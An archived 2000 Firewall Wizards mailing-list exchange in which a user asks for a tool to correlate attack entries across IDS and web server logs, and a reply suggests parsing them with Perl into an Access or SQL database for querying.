OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
NFR Wizards Archives: RE: Tools to correlate attacks b/w diff.

RE: Tools to correlate attacks b/w diff. logs

Subject: RE: Tools to correlate attacks b/w diff. logs
From: Desai, Ashish (Ashish.Desaifmr.com)
Date: Thu Jan 13 2000 - 10:06:57 CST

You can parse the logs in perl and then populate either MS Access or a SQL
like database (mySQL,Sybase...)
and run SQL queries.
Suprisingly, you can go quite a long way with Access, it supports a database
size of 2Gb.
Using VB in Access you can automate a lot in terms of populating the
database and running the queries.

Ashish Desai
Fidelity Investments
> -----Original Message-----
> From: Pete Storm [SMTP:petestormyahoo.com]
> Sent: Tuesday, January 11, 2000 3:18 PM
> To: firewall-wizardsnfr.net
> Subject: Tools to correlate attacks b/w diff. logs
>
> Hi all,
>
> Does anyone know of a tool out there that will allow
> me to correlate incidents between several different
> logs? For example, if I see an attempt to pull off a
> php exploit on my IDS it stands to reason that I'll
> see a similar log entry on my web server. What I'm
> looking for is something that will pull these two
> records out of the individual logs and place them in
> an "incident" log as a related event.
>
> The current problem is that we're talking about
> hundreds of thousands of log entries. Suppose I could
> Perl it, but I was kinda hoping there might be a
> commercial/shareware tool out there already that could
> do it so much better than I could.
>
> thanks,
> phs
> __________________________________________________
> Do You Yahoo!?
> Talk to your friends online with Yahoo! Messenger.
> http://im.yahoo.com

This archive was generated by hypermail 2b27 : Sat Jan 15 2000 - 21:37:24 CST